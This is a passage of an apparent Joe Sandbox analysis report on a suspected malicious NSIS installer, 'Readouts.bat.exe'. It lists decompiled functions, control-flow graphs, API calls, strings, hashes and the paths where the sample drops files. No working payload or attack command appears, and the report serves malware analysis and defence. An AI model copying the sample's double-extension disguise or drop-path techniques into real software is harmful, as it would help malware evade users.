                                                • API String ID: 3282139019-4127139157
                                                • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                                Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 304 4039d9-4039ea call 406152 298->304 305 4039ef-4039f5 lstrcatW 298->305 308 4039fa-403a23 call 403c4a call 405c61 299->308 304->305 305->308 313 403ab5-403abd call 405c61 308->313 314 403a29-403a2e 308->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 316 403a34-403a5c call 406152 314->316 316->313 322 403a5e-403a62 316->322 324 403b71-403b79 call 40140b 320->324 325 403af2-403b22 RegisterClassW 320->325 321->320 326 403a74-403a80 lstrlenW 322->326 327 403a64-403a71 call 405b86 322->327 338 403b83-403b8e call 403c4a 324->338 339 403b7b-403b7e 324->339 328 403c40 325->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 325->329 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->324 333->334 337 403a92-403a9c GetFileAttributesW 333->337 334->313 341 403aa2-403aa3 call 405ba5 337->341 342 403a9e-403aa0 337->342 348 403b94-403bae ShowWindow call 4065ee 338->348 349 403c17-403c18 call 4053bf 338->349 339->332 341->334 342->334 342->341 354 403bb0-403bb5 call 4065ee 348->354 355 403bba-403bcc GetClassInfoW 348->355 353 403c1d-403c1f 349->353 356 403c21-403c27 353->356 357 403c39-403c3b call 40140b 353->357 354->355 360 403be4-403c07 DialogBoxParamW call 40140b 355->360 361 403bce-403bde GetClassInfoW RegisterClassW 355->361 356->339 362 403c2d-403c34 call 40140b 356->362 357->328 366 403c0c-403c15 call 4038c4 360->366 361->360 362->339 366->332
                                                APIs
                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\Readouts.bat.exe",00000000), ref: 004039F5
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A75
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                  • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                • API String ID: 1975747703-1711698923
                                                • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D
                                                Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 395 402f9a-402fa1 387->395 396 4030bc-4030c4 call 402e79 387->396 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->374 391->389 419 403081-403087 391->419 392->389 417 4030c6-4030d7 392->417 401 402fa3-402fb7 call 405d35 395->401 402 40301d-403021 395->402 396->389 407 40302b-403031 401->407 416 402fb9-402fc0 401->416 406 403023-40302a call 402e79 402->406 402->407 406->407 413 403040-40304a 407->413 414 403033-40303d call 406751 407->414 413->384 418 403050 413->418 414->413 416->407 422 402fc2-402fc9 416->422 423 4030d9 417->423 424 4030df-4030e4 417->424 418->381 419->389 419->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->374 433->418 433->434 434->407 435 403019-40301b 434->435 435->407
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Readouts.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                  • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                  • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Readouts.bat.exe,C:\Users\user\Desktop\Readouts.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Readouts.bat.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Readouts.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-389077580
                                                • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 444 406514-406515 442->444 445 40650b-40650f call 406284 442->445 443->442 446 406312-40631e 443->446 445->444 448 406324-406362 446->448 449 4064df 446->449 450 406482-406486 448->450 451 406368-406373 448->451 452 4064e1-4064eb 449->452 453 4064ed-4064f0 449->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 463 40637c-40637f 454->463 460 406393-40639a 455->460 458 406490-40649c call 4061cb 456->458 459 40649e-4064aa call 406284 456->459 461 4064cc-4064dd lstrlenW 457->461 462 4064bf-4064c7 call 4062a6 457->462 473 4064af-4064b5 458->473 459->473 465 40639c-40639e 460->465 466 40639f-4063a1 460->466 461->440 462->461 463->455 469 406381-406384 463->469 465->466 471 4063a3-4063ca call 406152 466->471 472 4063dc-4063df 466->472 469->455 474 406386-40638a 469->474 484 4063d0-4063d7 call 4062a6 471->484 485 40646a-40646d 471->485 477 4063e1-4063ed GetSystemDirectoryW 472->477 478 4063ef-4063f2 472->478 473->461 476 4064b7 473->476 474->460 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 480->461 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 494 406415-40641c 492->494 495 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->495 496 406459 493->496 498 406424-406426 494->498 495->481 495->496 496->483 498->481 498->493
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,?,00405323,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000), ref: 004063FA
                                                • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,?,00405323,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000), ref: 00406436
                                                • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,?,00405323,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000), ref: 004064CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-604057220
                                                • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                                Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 40176f-401794 call 402c41 call 405bd0 568 401796-40179c call 406284 563->568 569 40179e-4017b0 call 406284 call 405b59 lstrcatW 563->569 574 4017b5-4017b6 call 406518 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 4065c7 578->579 580 4017f2-4017f5 578->580 588 4017dd-4017ef 579->588 589 4017cd-4017db CompareFileTime 579->589 581 4017f7-4017f8 call 405d55 580->581 582 4017fd-401819 call 405d7a 580->582 581->582 590 40181b-40181e 582->590 591 40188d-4018b6 call 4052ec call 403116 582->591 588->580 589->588 592 401820-40185e call 406284 * 2 call 4062a6 call 406284 call 4058ea 590->592 593 40186f-401879 call 4052ec 590->593 603 4018b8-4018bc 591->603 604 4018be-4018ca SetFileTime 591->604 592->578 625 401864-401865 592->625 605 401882-401888 593->605 603->604 607 4018d0-4018db CloseHandle 603->607 604->607 608 402ace 605->608 610 4018e1-4018e4 607->610 611 402ac5-402ac8 607->611 612 402ad0-402ad4 608->612 614 4018e6-4018f7 call 4062a6 lstrcatW 610->614 615 4018f9-4018fc call 4062a6 610->615 611->608 622 401901-4022fc call 4058ea 614->622 615->622 622->612 625->605 627 401867-401868 625->627 627->593
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                  • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                  • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                  • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll), ref: 00405359
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                  • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp$C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon$Call
                                                • API String ID: 1941528284-3728131154
                                                • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 629 4052ec-405301 630 405307-405318 629->630 631 4053b8-4053bc 629->631 632 405323-40532f lstrlenW 630->632 633 40531a-40531e call 4062a6 630->633 635 405331-405341 lstrlenW 632->635 636 40534c-405350 632->636 633->632 635->631 639 405343-405347 lstrcatW 635->639 637 405352-405359 SetWindowTextW 636->637 638 40535f-405363 636->638 637->638 640 405365-4053a7 SendMessageW * 3 638->640 641 4053a9-4053ab 638->641 639->636 640->641 641->631 642 4053ad-4053b0 641->642 642->631
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll), ref: 00405359
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsbEAA6.tmp\System.dll
                                                • API String ID: 2531174081-427708816
                                                • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 648 402ace-402ad4 646->648 649 402672 647->649 650 402675-402678 647->650 649->650 652 4027dc-4027e4 650->652 653 40267e-40268d call 4061e4 650->653 652->646 653->652 656 402693 653->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 661 402737-40273a 658->661 662 40274d-40275d call 405dfd 658->662 659->652 660 4026c4-4026c9 659->660 660->652 663 4026cf-4026dd 660->663 661->662 664 40273c-402747 call 405e5b 661->664 662->652 671 40275f 662->671 666 4026e3-4026f5 MultiByteToWideChar 663->666 667 402798-4027a4 call 4061cb 663->667 664->652 664->662 670 4026f7-4026fa 666->670 666->671 667->648 675 4026fc-402707 670->675 674 402762-402765 671->674 674->667 677 402767-40276c 674->677 675->674 678 402709-40272e SetFilePointer MultiByteToWideChar 675->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->675 681 402730 678->681 683 4027ca-4027d6 SetFilePointer 679->683 684 4027af-4027b3 679->684 680->679 682 402775-402788 680->682 681->671 682->652 685 40278a-402790 682->685 683->652 686 4027b5-4027b9 684->686 687 4027bb-4027c8 684->687 685->657 688 402796 685->688 686->683 686->687 687->652 688->652
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                  • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71
                                                • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
